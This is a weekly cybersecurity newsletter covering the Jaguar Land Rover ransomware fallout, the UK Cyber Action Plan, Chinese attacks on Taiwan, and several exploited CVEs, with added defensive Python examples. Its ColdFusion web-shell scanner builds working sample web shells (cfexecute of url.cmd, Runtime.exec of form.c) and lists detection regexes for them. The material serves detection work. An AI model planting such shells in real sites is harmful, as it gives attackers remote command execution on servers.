This Week in Cybersecurity #36
JLR's 43% Sales Collapse Proves Breach Impact, UK Admits Cyber Strategy Failed, China Attacks Taiwan 2.63M Times Daily, and the Kinetic-Cyber Line Disappears in the Baltic Sea
Good morning, Security Gang!
This week, cybersecurity stopped being theoretical and became brutally, undeniably economic reality. Jaguar Land Rover’s ransomware attack resulted in a 43% global sales collapse—North America down 64%, Europe down 48%, China down 46%—costing the company $220 million in a single quarter and forcing a £1.5 billion government bailout while the Bank of England cited the breach as a drag on national GDP.
Meanwhile, in an unprecedented admission of failure, the UK government launched a new Cyber Action Plan after openly declaring its government cyber risk “critically high” and admitting that legacy strategies, decentralized ownership, and fragmented responsibility have catastrophically failed. The plan proposes a centralized cyber command structure with mandatory MFA, logging, SBOM requirements, and measurable milestones across all critical sectors.
On the geopolitical front, China launched 2.63 million daily cyberattacks on Taiwan (a 113% increase over 2023) targeting energy, hospitals, and emergency services with attacks on the energy sector surging tenfold, while Trump ordered divestment of a $2.9 million Chinese semiconductor deal citing national security risks, and Finnish authorities arrested Russian ship crew members for deliberately cutting undersea Baltic telecom cables in what investigators are calling “an act of sabotage under the veil of maritime activity.”
Add in 10,000+ Fortinet firewalls still vulnerable to a 2020 MFA bypass that’s been patchable for five years, the first CVSS 10.0 vulnerability of 2026 in the n8n automation platform, a Chrome extension with 900,000 installs caught stealing AI chat logs and tokens, CISA’s Known Exploited Vulnerabilities Catalog growing by 20% to 1,480 CVEs, and LockBit 5.0 emerging leaner and faster while BlackCat ransomware gangs are literally buying Google Ads for SEO poisoning campaigns, and you have a week that proves beyond any doubt that the kinetic-cyber line has disappeared, that economic consequences are now the primary metric of cyber risk, and that 2026 is the year when operational maturity stops being aspirational and becomes survival-critical.
Let’s break down the economic carnage, government admissions, geopolitical escalations, and the patches you should have applied five years ago—coffee ready, Security Gang, because this is what cyber risk looks like when it becomes real.
💰 CRITICAL INFRASTRUCTURE & ECONOMIC IMPACT
Jaguar Land Rover: 43% Sales Collapse Proves Cyber Is Economic Warfare
The fallout from Jaguar Land Rover’s ransomware attack continues—and it’s brutal. The company confirmed a 43% plunge in global wholesale volumes tied directly to the cyber incident. Production, logistics, and distribution all ground to a halt, crippling deliveries and inventory flow.
Regional Impact:
North America: 64% sales decline
Europe: 48% decline
China: 46% decline
UK: 0.9% decline (domestic operations cushioned the blow)
The attack cost the company roughly $220 million in one quarter, prompting a £1.5 billion government bailout. The Bank of England even cited the breach as a drag on national GDP.
James’s assessment was definitive: “This isn’t a network outage — it’s an economic event. A 43% global sales hit is what cyber risk looks like when it becomes real.”
This case will define how boards view cybersecurity in 2026—not as a cost center, but as a revenue protector and economic stability mechanism.
Sedgwick Confirms Ransomware Incident
Sedgwick, one of the largest third-party risk and claims management firms in the world, confirmed a cyber incident claimed by the TridentLocker ransomware gang. The attackers accessed a segmented file transfer system, leaked employee data samples, and are claiming credit.
Sedgwick says claims systems remain operational and no customer data was directly impacted, though investigators are still assessing potential PII exposure. For context, Sedgwick works with DHS, ICE, CISA, the Department of Labor, and other federal agencies—meaning federal employee data may be at risk if lateral movement occurred.
James noted: “If you’re in risk management and get hit yourself, it’s not just about forensics — it’s about credibility. How you respond defines whether clients stay or walk.”
This attack reinforces that identity remains the new perimeter—access abuse, credential reuse, and privilege escalation are the real battlegrounds.
Brightspeed Investigating Cyberattack
U.S. telecom provider Brightspeed confirmed it is investigating a cyber incident impacting its internal systems. Details are still limited, but the Crimson Collective hacking group has claimed responsibility, saying they stole customer and billing data, payment details, and service records.
If accurate, attackers may have gained ERP or Oracle EBS system access, exposing metadata, architecture diagrams, and subscriber information. This case highlights the increasing targeting of telecom infrastructure as a supply-chain vector for espionage and credential harvesting.
🏛️ GOVERNMENT POLICY & REGULATORY RESPONSE
UK Government Launches New Cyber Action Plan After Admitting Failure
In an unprecedented moment of governmental candor, the UK government announced a new Cyber Action Plan after acknowledging its old strategies failed. The initiative comes directly in response to the JLR attack and its impact on GDP.
The plan introduces baseline security controls across government and critical industry sectors:
Mandatory MFA
Enhanced logging
Vulnerability management
SBOM requirements
Resilience testing for essential services
James emphasized: “The Brits just admitted what most governments won’t — that what they’ve been doing hasn’t worked. But this is their chance to build a real CISA-style response unit.”
The UK wants to build a centralized cyber command structure with mandatory standards, measurable milestones, and real funding. It’s modeled partly on CISA but gives more direct power to the new Government CISO.
However, there’s a tradeoff: Centralization can create resilience, or bureaucratic paralysis. The UK’s model works only if its leadership is competent—because, unlike the U.S.’s federated approach, this one lives or dies by the person in charge.
James explained the global models:
UK: optimizes for control and execution
U.S.: optimizes for scale and adaptability
EU: optimizes for consistency
Israel: optimizes for speed
Singapore: optimizes for precision
Every model has tradeoffs—and the UK’s may prove to be the most daring experiment of 2026.
Australia’s Anti-Scam Framework Draws Fire
Australia rolled out its new National Anti-Scam Framework, but critics argue it leaves too many gaps, especially around key financial rails and certain online platforms. The framework sets out roles for regulators, banks, and telecoms—but still relies heavily on voluntary compliance.
James’s assessment was blunt: “If regulation moves slower than the scammer, it’s not regulation — it’s decoration.”
Organizations Should:
Treat the framework as a floor, not a ceiling
Implement enterprise-side holds on suspicious transactions
Enforce beneficiary change callbacks and brand abuse takedowns
Illinois State Agency Exposes 700,000 Residents’ Data
The Illinois Department of Human Services (IDHS) confirmed a data exposure impacting 700,000 residents, including 672,000 Medicaid and Medicare Savings Program participants. Early indicators suggest this was a misconfiguration, not a hack—but the exposed records could still fuel identity theft and benefits fraud.
James emphasized: “Misconfigurations aren’t harmless — they’re doorways left open by neglect. And taxpayers always end up paying the bill.”
IDHS Must:
Conduct asset inventories
Perform access reviews
Rotate keys
Enable object-level logging
Enforce MFA for all admins
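The write-up does not say which platform IDHS misconfigured, so the following added example (not IDHS’s or any vendor’s tooling) assumes an AWS S3-style bucket policy and Public Access Block settings and shows the access-review check a team would run after an exposure like this: find policy statements that let anonymous callers read or list the bucket, and report which account-level guardrails that would have stopped it are switched off. The policy, bucket name, account ID, and block settings are all constructed samples.

```python
"""Check an object-storage bucket for anonymous read access.

Added example.  Assumes an AWS S3-style bucket policy plus the Public Access
Block settings; both inputs below are constructed, and the bucket name and
account id are placeholders, not real resources."""
import json

# Actions that let an anonymous principal read or enumerate data.
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}
PAB_SETTINGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")

SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {   # the bad one: anyone on the internet may fetch every object
            "Sid": "AllowPortalRead",
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::benefits-export-placeholder/*",
        },
        {   # scoped to one IAM role: fine
            "Sid": "AllowCaseworkers",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:role/caseworker"},
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::benefits-export-placeholder",
                         "arn:aws:s3:::benefits-export-placeholder/*"],
        },
        {   # wildcard principal fenced by a source-IP condition: not anonymous
            "Sid": "AllowFromOfficeRange",
            "Effect": "Allow",
            "Principal": {"AWS": "*"},
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::benefits-export-placeholder/*",
            "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}},
        },
    ],
})

# Constructed Public Access Block state: two of the four guards are off.
SAMPLE_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
              "BlockPublicPolicy": False, "RestrictPublicBuckets": False}


def _as_list(value):
    """Policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def principal_is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}: any caller, signed or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for values in principal.values() for p in _as_list(values))
    return False


def public_read_statements(policy_json):
    """Sids of Allow statements granting anonymous read/list access with no
    Condition that narrows who qualifies."""
    findings = []
    for index, statement in enumerate(_as_list(json.loads(policy_json)["Statement"])):
        if statement.get("Effect") != "Allow":
            continue
        if not principal_is_anonymous(statement.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(statement.get("Action", []))}
        if actions & READ_ACTIONS and not statement.get("Condition"):
            findings.append(statement.get("Sid", f"statement-{index}"))
    return findings


def public_access_block_gaps(pab):
    """Public Access Block guards that are not enabled."""
    return [name for name in PAB_SETTINGS if not pab.get(name, False)]


def assess(policy_json, pab):
    """Combine both checks.  RestrictPublicBuckets neutralises a public policy
    even if one is attached, so exposure needs both a public statement and
    that guard being off."""
    statements = public_read_statements(policy_json)
    gaps = public_access_block_gaps(pab)
    return {"public_statements": statements, "pab_gaps": gaps,
            "exposed": bool(statements) and "RestrictPublicBuckets" in gaps}


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_POLICY, SAMPLE_PAB), indent=2))
```

Run it against a policy pulled with `get-bucket-policy` and the block state from `get-public-access-block`; a non-empty `public_statements` list is the access-review finding, and `pab_gaps` tells you which guardrail to turn on before you rotate keys and enable object-level logging.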
🎯 GEOPOLITICAL CYBER WARFARE
Trump Orders Divestment in $2.9M Chinese Chip Deal
In a move blending geopolitics and cybersecurity, President Trump ordered a divestment of a $2.9 million semiconductor deal between aerospace defense supplier EmmaCorp and Chinese buyer He Fu, citing national security risks.
The White House says the divestment order was based on credible evidence the acquirer is a Chinese citizen and that the deal could give Beijing access to sensitive U.S. chip fabrication technology. The president has given 180 days for full separation.
James called it plainly: “Trump’s not just blocking chips — he’s signaling to China that technology is the new terrain of deterrence.”
Following Maduro’s capture—and his prior meeting with Chinese officials—this move rattled markets and sent a clear message: the U.S. is drawing hard lines between national defense and foreign tech influence. Expect a more aggressive Chinese posture in cyberspace this quarter.
China’s Cyber Pressure on Taiwan Escalates
Taiwan’s National Security Bureau reported a staggering 2.63 million daily cyberattacks in 2025—a 113% increase over 2023—most linked to China’s People’s Liberation Army (PLA). Targets included energy, emergency services, and hospitals, reflecting China’s hybrid warfare model.
China’s Energy Attacks on Taiwan Surge Tenfold
Taiwan’s energy sector is now facing a tenfold increase in cyberattacks from China’s military-linked groups. These attacks target operational and billing systems—aiming to disrupt maintenance and power distribution.
What’s fascinating is the timing. Just as the U.S. carried out a covert nighttime extraction operation in Venezuela, cutting power in Caracas, China’s escalation against Taiwan may have been a test case.
James observed: “This isn’t just hacking — it’s geopolitical signaling. The U.S. flipped Caracas’s lights out to send Beijing a message: we can do to you what you plan to do to Taipei.”
These attacks blend credential abuse, phishing, and living-off-the-land tactics to burrow into vendor networks. CISOs with East Asia dependencies must segment, monitor, and validate every connection—because the cyber-kinetic line is fading fast.
Baltic Cable Sabotage Under Investigation
In a story blending kinetic and cyber, Finnish authorities arrested two crew members of a Russian-linked cargo ship suspected of damaging undersea telecom cables in the Baltic Sea.
The ship, Fitzberg, carried sanctioned Russian steel and was reportedly dragging anchors or heavy gear that cut fiber cables operated by Finnish telecom Elisa in Estonia’s EEZ. Finland’s National Bureau of Investigation is leading the probe, calling it “an act of sabotage under the veil of maritime activity.”
James put it perfectly: “The kinetic side of cyber isn’t going away — it’s the other half of the same coin. You cut cables, you cut comms — and that’s war in 2026.”
Russia-Linked Malware Hits European Hospitality Sector
Russia-linked threat group Fancy Bear (APT28) has been deploying malicious drivers that trigger Blue Screen of Death restarts across European hospitality networks. This isn’t a destructive attack—it’s stealth. The forced reboots allow malware to establish persistence at a low-noise level.
If you operate in travel, retail, or hotel IT:
Assume thin-client exposure
Enable Device Guard
Implement allowlisting
Enforce driver signature enforcement across your fleet
James noted: “Russia’s not targeting guests — they’re targeting confidence. If Europe’s tourism engine stutters, its economy follows.”
Russia Abuses Viber Messaging Platform in Ukraine
Russia-aligned actors are also exploiting the Viber messaging platform in the Russia–Ukraine conflict to distribute info-stealers and misinformation campaigns. The method involves phishing ZIP files disguised as Office documents. Once opened, LNK loaders fetch payloads using PowerShell and connect to C2 servers.
While Viber isn’t popular in the U.S., this tactic shows how trusted consumer platforms are being weaponized for espionage and disruption.
Chinese Scam Kingpin Arrested and Extradited
Authorities in Cambodia arrested Chen Zhi, head of the Prince Group—a conglomerate accused of running massive scam call centers, human trafficking operations, and crypto laundering networks worth over $15 billion.
Chen was extradited to China rather than the U.S. or UK, keeping the case inside Beijing’s legal jurisdiction. Western intelligence sources believe this is less about justice and more about damage control, since Chinese officials were allegedly tied to the same scam syndicates.
James observed: “China’s cleaning house in public, but make no mistake — this was a cover-up dressed as cooperation.”
🔗 THIRD-PARTY & SUPPLY CHAIN COMPROMISES
Ledger Customers Impacted by Global-E Vendor Breach
Ledger, the crypto hardware wallet company, confirmed some customer data was exposed following a breach at e-commerce partner Global-E. While wallet hardware and keys remain secure, threat actors now have access to accurate contact details, shipping addresses, and transaction histories—the perfect recipe for phishing and BEC.
James was blunt: “If you’re changing vendor banking info over email in 2026, you’re already behind the eight ball.”
Companies Should:
Block scam domains targeting vendor customer portals
Enforce banking info changes through secure portals, not via email
Launch proactive takedown campaigns to preempt fraud attempts
ReSecurity Turns Hack Into Honeypot Victory
Cyber firm ReSecurity found itself at the center of controversy after the Scattered Lapsus group claimed to have breached its systems. They posted what they said were internal chats and client logs.
But ReSecurity immediately pushed back—revealing it was actually a deception campaign. The data came from a staged honeypot environment, built to gather threat telemetry and attacker TTPs.
James’s advice: “Plan your communications strategy before a honeypot goes public. Threat actors love to overhype fake breaches. Handle it right, and it’s a win.”
NordVPN Denies Breach Claims
Threat actors claimed to have exfiltrated NordVPN’s user data, but the company quickly denied the claims, saying the leaked information was dummy data from a non-production environment.
James noted: “I’m not quick to believe hackers. In 2026, fake data is bait — and companies are finally smart enough to use it.”
While skepticism is healthy, this story underscores how development environments remain underprotected. Many lack endpoint controls or telemetry, making them an easy target for both real and deceptive breaches.
🔥 CRITICAL VULNERABILITIES & ZERO-DAYS
10,000+ Fortinet Firewalls Still Exposed to 2FA Bypass
Here’s the jaw-dropper: more than 10,000 Fortinet firewalls remain vulnerable to a 2020 MFA bypass flaw (CVE-2020-12812), which lets a user who signs in to the SSL VPN with a differently cased username skip the second factor when authentication is backed by LDAP. Shadowserver’s scans show LDAP-enabled configurations are most at risk. The fix has been out for five years, but admins still haven’t patched.
Update immediately to:
6.4.1+
6.2.4+
6.0.10+
Or at minimum enforce username case sensitivity and review SSL VPN logs for mismatched casing.
Unpatched Fortinet = open door to ransomware. Full stop.
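The log review suggested above has a concrete shape: the bypass shows up as the same account establishing SSL VPN sessions under more than one spelling of its username. The added example below (not Fortinet’s or Shadowserver’s code) hunts for that pattern over FortiGate-style key=value event lines; the lines themselves are constructed samples in an assumed format, so adjust the field names to match your own log forwarder before running it on real data.

```python
"""Hunt FortiGate SSL VPN event logs for the same account logging in under
different username casings, the footprint of the CVE-2020-12812 2FA bypass
against LDAP-backed users.  The log lines are constructed samples in the
FortiGate key=value style (assumed format), not real telemetry."""
import re
from collections import defaultdict

# Constructed sample events.  "tunnel-up" means the SSL VPN session was
# established; the first line is a failed login and is ignored by the hunt.
SAMPLE_LOGS = """\
date=2026-01-05 time=08:12:33 type="event" subtype="vpn" action="ssl-login-fail" tunneltype="ssl-web" user="jdoe" group="ldap-users" remip=203.0.113.7 reason="sslvpn_login_permission_denied"
date=2026-01-05 time=08:12:41 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="jdoe" group="ldap-users" remip=203.0.113.7
date=2026-01-05 time=08:13:02 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="JDoe" group="ldap-users" remip=198.51.100.23
date=2026-01-05 time=09:01:10 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="asmith" group="ldap-users" remip=192.0.2.44
date=2026-01-05 time=09:44:19 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="ASMITH" group="ldap-users" remip=192.0.2.44
date=2026-01-05 time=10:05:55 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-web" user="bwong" group="local-users" remip=203.0.113.90
"""

# key=value where the value is either "quoted" or a bare token.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Return a dict of the key=value pairs on one FortiGate log line."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def find_case_variants(log_text, session_actions=("tunnel-up",)):
    """Group established SSL VPN sessions by lower-cased username and return
    {canonical_user: {spelling: set(remote_ips)}} for every account that
    connected under more than one spelling."""
    seen = defaultdict(lambda: defaultdict(set))
    for raw in log_text.splitlines():
        event = parse_line(raw)
        if event.get("subtype") != "vpn" or event.get("action") not in session_actions:
            continue
        user = event.get("user")
        if user:
            seen[user.lower()][user].add(event.get("remip", "?"))
    return {user: dict(spellings) for user, spellings in seen.items() if len(spellings) > 1}


def report(findings):
    """Render findings as one line per suspicious account."""
    lines = []
    for canonical, spellings in sorted(findings.items()):
        detail = "; ".join(
            f'{spelling} from {", ".join(sorted(ips))}'
            for spelling, ips in sorted(spellings.items())
        )
        lines.append(f"[!] {canonical}: sessions as {detail}")
    return lines


if __name__ == "__main__":
    for line in report(find_case_variants(SAMPLE_LOGS)) or ["no case-variant logins found"]:
        print(line)
```

A hit is not proof of exploitation on its own (some users really do type their name both ways), but a second spelling arriving from a new source address on an LDAP-backed account is exactly the session to pull apart while the upgrade is scheduled.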
n8n Automation Platform: CVSS 10.0 RCE - First Maximum-Severity CVE of 2026
Open-source workflow tool n8n disclosed a CVSS 10.0 remote code execution vulnerability (CVE-2026-21877)—the first CVSS 10.0 vulnerability of 2026. Low-code automation tools often run with broad API and credential access, making this flaw particularly dangerous.
Organizations Should:
Upgrade to version 1.121.3 or later
Restrict admin access to VPN or allowlists
Rotate API keys immediately
James emphasized: “n8n is the new shadow IT — it’s what connects your workflows, but it’s also what attackers can use to own them.”
Veeam Fixes Critical RCE Vulnerability
Veeam issued an urgent patch for CVE-2025-5470, a remote code execution flaw in its Backup & Replication software, rated 9.0 CVSS. Attackers exploiting this bug could gain control over backup servers, pivot laterally, and disable ransomware recovery.
Patch now:
Remove public management access
Rotate credentials
Alert on unexpected restore or export jobs
This vulnerability hits the heart of business continuity systems—and that’s where attackers strike hardest.
Android Patches Critical Dolby RCE Flaw
Google’s January patch dropped with a critical Dolby Media Framework vulnerability (CVE-2025-5549) enabling remote code execution via crafted media files. This flaw lives in devices your staff carry into meetings every day.
Push this update immediately—especially on devices accessing enterprise SaaS apps or communications platforms. Enforce patch levels enterprise-wide through MDM policies and block unknown media attachments.
Adobe ColdFusion Servers Under Coordinated Attack
Researchers at GreyNoise detected a coordinated exploitation campaign targeting unpatched or misconfigured Adobe ColdFusion servers. Attackers are deploying web shells and backdoors to maintain persistence.
Organizations running ColdFusion should immediately:
Confirm patch levels
Disable admin interfaces from the internet
Sweep for unexpected CFIDE artifacts or web shells
If you’re still running legacy ColdFusion workloads—isolate them now. These are high-value targets for ransomware operators.
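A web shell sweep is the one item on that list teams most often improvise under pressure, so here is a worked version. It is an added example, not GreyNoise’s or Adobe’s tooling: it walks a ColdFusion webroot, flags templates that match common shell heuristics (cfexecute, Java Runtime/ProcessBuilder calls, evaluate() of request data, cmd-style request parameters, base64 loaders), and notes whether the file sits under CFIDE. The webroot and its four files are constructed in a temporary directory so the sweep runs offline; a hit is a lead to triage, not proof of compromise.

```python
"""Sweep a ColdFusion webroot for web-shell patterns and report where they sit.

Added example.  The webroot is built in a temporary directory from constructed
files so the sweep runs offline; the rules are heuristics."""
import re
import tempfile
from pathlib import Path

# Heuristic rules: name -> case-insensitive regex over file contents.
SHELL_RULES = {
    "cfexecute": re.compile(r"<cfexecute\b", re.I),
    "runtime-exec": re.compile(r"java\.lang\.Runtime|ProcessBuilder", re.I),
    "request-to-eval": re.compile(r"\bevaluate\s*\(\s*(url|form|cgi)\.", re.I),
    "cmd-parameter": re.compile(r"\b(url|form)\.(cmd|exec|command|c)\b", re.I),
    "encoded-loader": re.compile(r"binaryDecode\s*\([^)]*base64", re.I),
}
SCAN_SUFFIXES = {".cfm", ".cfc", ".cfml", ".jsp", ".jspx"}


def scan_file(path):
    """Return the names of the rules a single file matches."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return []
    return [name for name, rule in SHELL_RULES.items() if rule.search(text)]


def sweep(root):
    """Walk root and return {relative_posix_path: {"rules": [...], "in_cfide": bool}}
    for every template matching at least one rule.  CFIDE is called out because
    its scripts directories are a favourite drop location on ColdFusion hosts."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        rules = scan_file(path)
        if rules:
            rel = path.relative_to(root)
            in_cfide = "CFIDE" in {part.upper() for part in rel.parts[:-1]}
            hits[rel.as_posix()] = {"rules": rules, "in_cfide": in_cfide}
    return hits


def make_sample_webroot():
    """Create a throwaway webroot: two constructed shells, two clean templates."""
    root = Path(tempfile.mkdtemp(prefix="cfroot-"))
    files = {
        "index.cfm": "<cfoutput>Welcome back, #session.displayName#</cfoutput>",
        "reports/export.cfm": '<cfhttp url="https://reports.internal.example/run" method="get"></cfhttp>',
        "CFIDE/scripts/ajax/h.cfm": (
            '<cfif isDefined("url.cmd")><cfexecute name="/bin/sh" arguments="-c #url.cmd#" '
            'variable="out" timeout="30"></cfexecute><cfoutput>#out#</cfoutput></cfif>'
        ),
        "images/upload.cfm": (
            '<cfscript>rt = createObject("java", "java.lang.Runtime").getRuntime();'
            "p = rt.exec(form.c);</cfscript>"
        ),
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return str(root)


if __name__ == "__main__":
    for rel, info in sorted(sweep(make_sample_webroot()).items()):
        where = " (inside CFIDE)" if info["in_cfide"] else ""
        print(f"[!] {rel}{where}: {', '.join(info['rules'])}")
```

Point `sweep()` at the real webroot (and at any additional mapped directories) and pair the hits with file modification times and the web server access log to separate a planted shell from a developer’s forgotten test page.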
VMware ESXi Exploit Toolkit Targets Legacy Servers
A new turnkey exploit kit is spreading rapidly among attackers targeting unpatched VMware ESXi servers. The toolkit chains old CVEs with weak management exposures to deploy ransomware or steal credentials.
Admins Should:
Patch ESXi to supported builds
Hide vSphere and vCenter behind VPNs and IP allowlists
Rotate datastore credentials
Alert on sudden snapshot or encryption bursts
James emphasized: “ESXi is the crown jewel of compute — treat it like it.”
Critical JS PDF Flaw Enables Secret Data Theft
A critical flaw in JS PDF, the open-source library used to generate PDFs, lets attackers embed malicious JavaScript that steals secrets and tokens when opened.
Developers Should:
Upgrade JS PDF to the latest version
Add Content Security Policy (CSP) headers
Sandbox untrusted PDFs in isolated viewers
Treat inline PDFs as executable content—because they are.
FortiWeb Exploited to Drop Sliver C2 Framework
Researchers uncovered multiple FortiWeb edge devices running outdated firmware being exploited to deploy Sliver C2 beacons. Attackers also paired this with React2Shell vulnerabilities, combining RCE with stealthy lateral movement.
If you’re running FortiWeb:
Patch immediately to 6.1.62+
Audit for Sliver C2 artifacts and FRP binaries
Rotate TLS keys and admin credentials post-incident
D-Link DSL Routers Exploited
Attackers are exploiting a remote code execution flaw in legacy D-Link DSL routers, turning them into footholds into corporate SaaS environments.
If your branch offices or rural sites still run DSL:
Isolate devices behind an ISP router
Disable remote admin access
Monitor for DNS tampering or rogue egress traffic
Or better yet—replace them. James quipped: “If you’re still on DSL in 2026, it’s time to join the rest of the century — Starlink’s calling.”
Doticat Malware Targets Microsoft Exchange Servers
The Doticat malware is actively exploiting unpatched Microsoft Exchange servers via IIS modules, performing credential harvesting and mailbox exfiltration.
Enterprises Should:
Upgrade to supported Exchange builds
Enable Extended Protection for Authentication
Rotate service credentials and certificates
Watch for odd mailbox export spikes or child processes linked to Exchange
CISA KEV Catalog Grows by 20%
CISA’s Known Exploited Vulnerabilities (KEV) Catalog expanded by 20% in 2025, now including 1,480 CVEs—a stark reminder that exploited CVEs should drive your patching priorities.
Top exploit types:
Command injection: 18
Deserialization: 14
Path traversal: 13
Use-after-free: 11
James was emphatic: “If you’re still patching by CVSS score instead of active exploitation — you’re doing it wrong.”
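What “patch by exploitation, not by score” looks like in practice is a join between your vulnerability inventory and the KEV feed. The added example below (not CISA’s code) mirrors the field names of CISA’s JSON feed at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json, but its two catalog entries and their dates are constructed placeholders, as is the four-host inventory; it uses the CVE identifiers and CVSS scores already discussed on this page and ranks KEV entries with known ransomware use first, other KEV entries second, and everything else by CVSS, then shows how the same list would come out under a CVSS-only ordering.

```python
"""Rank a vulnerability inventory by CISA KEV membership first, CVSS second.

Added example.  KEV_SAMPLE follows the schema of CISA's feed but its entries
and dates are constructed for illustration; pull the live file in production.
The inventory is constructed as well."""
import json
from datetime import date

REPORT_DATE = date(2026, 1, 12)   # fixed "today" so overdue checks are reproducible

KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "vulnerabilities": [
        # dateAdded/dueDate below are placeholders, not the catalog's real values
        {"cveID": "CVE-2020-12812", "vendorProject": "Fortinet", "product": "FortiOS",
         "dateAdded": "2025-06-20", "dueDate": "2025-12-20", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2025-55182", "vendorProject": "Meta", "product": "React Server Components",
         "dateAdded": "2026-01-09", "dueDate": "2026-01-30", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory: what the scanner found, with its CVSS base scores.
INVENTORY = [
    {"host": "fw-edge-01", "cve": "CVE-2020-12812", "cvss": 9.8},
    {"host": "web-app-03", "cve": "CVE-2025-55182", "cvss": 10.0},
    {"host": "automation-01", "cve": "CVE-2026-21877", "cvss": 10.0},
    {"host": "backup-01", "cve": "CVE-2025-5470", "cvss": 9.0},
]

TIER_LABELS = {0: "KEV + ransomware", 1: "KEV", 2: "not in KEV"}


def load_kev(feed_json):
    """Index the KEV feed by CVE id."""
    return {entry["cveID"]: entry for entry in json.loads(feed_json)["vulnerabilities"]}


def tier(kev_entry):
    """0 = exploited and tied to ransomware, 1 = exploited, 2 = no evidence of exploitation."""
    if kev_entry is None:
        return 2
    return 0 if kev_entry.get("knownRansomwareCampaignUse") == "Known" else 1


def prioritize(inventory, kev, today=REPORT_DATE):
    """Return inventory items enriched with tier, label, KEV due date and an
    overdue flag, sorted KEV-first and CVSS-second."""
    ranked = []
    for item in inventory:
        entry = kev.get(item["cve"])
        level = tier(entry)
        due = date.fromisoformat(entry["dueDate"]) if entry else None
        ranked.append({**item, "tier": level, "label": TIER_LABELS[level],
                       "due": due.isoformat() if due else None,
                       "overdue": bool(due and due < today)})
    ranked.sort(key=lambda r: (r["tier"], -r["cvss"], r["cve"]))
    return ranked


def by_cvss_only(inventory):
    """The ordering a score-driven programme would produce, for comparison."""
    return [item["cve"] for item in sorted(inventory, key=lambda i: (-i["cvss"], i["cve"]))]


if __name__ == "__main__":
    for row in prioritize(INVENTORY, load_kev(KEV_SAMPLE)):
        flag = " OVERDUE" if row["overdue"] else ""
        print(f"{row['host']:<14} {row['cve']:<16} {row['cvss']:>4}  {row['label']}{flag}")
    print("CVSS-only order:", by_cvss_only(INVENTORY))
```

The contrast is the point: by CVSS alone the Fortinet flaw drops to third behind two 10.0s, while the KEV-aware ordering puts it first because it is exploited and linked to ransomware, and the `overdue` flag tells you the remediation clock CISA set for federal agencies has already run out.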
💣 RANSOMWARE & MALWARE OPERATIONS
LockBit 5.0 Ransomware Emerges
LockBit 5.0 is back—leaner, faster, and nastier. Despite multiple takedowns, LockBit’s infrastructure has re-emerged with automated initial access tools and faster encryption speed.
Defenders Should:
Prioritize patching KEV vulnerabilities
Disable VPNs without MFA
Hunt for common loader chains like Office macros, archives, and PowerShell-based loaders
LockBit’s persistence proves one thing: ransomware isn’t dying—it’s industrializing.
BlackCat/ALPHV Launch SEO Poisoning Malware Campaign
The BlackCat ransomware gang (also known as ALPHV) is using SEO poisoning to lure victims. Search results for popular software now lead to Trojanized installers that infect admins and power users.
To Defend:
Block ads of unknown origin
Download only from verified publisher stores
Deploy EDR tuned for PowerShell and LOLBin abuse
James joked: “If ransomware gangs are buying Google Ads, maybe the problem isn’t security — it’s marketing.”
RondoDox Botnet Weaponizes React2Shell
A new botnet named RondoDox is exploiting React2Shell vulnerabilities to recruit infected nodes and deploy payloads. This continues the exploitation of the React2Shell flaw (CVE-2025-55182), a remote code execution vulnerability in React Server Components, where vulnerable web front ends become the attacker’s entry point.
You Should:
Enable WAF virtual patching rules
Lock admin routes
Monitor for unusual tunneling behavior
🤖 AI SECURITY & EMERGING THREATS
AI Prompt Injection: The Long-Term Threat
OpenAI reaffirmed that prompt injection—malicious content that manipulates model behavior—remains a long-term, unsolved problem in AI systems.
The company advised enterprises piloting AI integrations to:
Treat model inputs like untrusted user data
Implement context firewalls and retrieval limits
Require human-in-the-loop approval for sensitive actions
James emphasized: “AI isn’t hacking us — people are hacking the inputs. That’s the problem we’re not ready for.”
AI adoption without security guardrails will create more chaos than efficiency.
Chrome Extension Stealing AI Chats Hits 900K Installs
A malicious Chrome extension called AI Helper with over 900,000 installs was caught stealing AI-generated chat logs, tokens, and user data. This means intellectual property, code snippets, and even confidential deal drafts pasted into AI tools were being exfiltrated in real time.
To Mitigate:
Restrict corporate Chrome to an allowlist
Ban unsanctioned AI extensions
Adopt enterprise AI tenants with DLP and retention policies
James reminded listeners: “If you’re pasting code or contracts into a web UI, you’re not chatting — you’re leaking.”
📊 DATA BREACHES & EXPOSURES
Iberia Airlines: ‘New’ Breach Is Just Old News
Spanish national carrier Iberia Airlines pushed back on claims of a “new” data breach, saying the data currently circulating online comes from the November 2025 incident it already disclosed and contained.
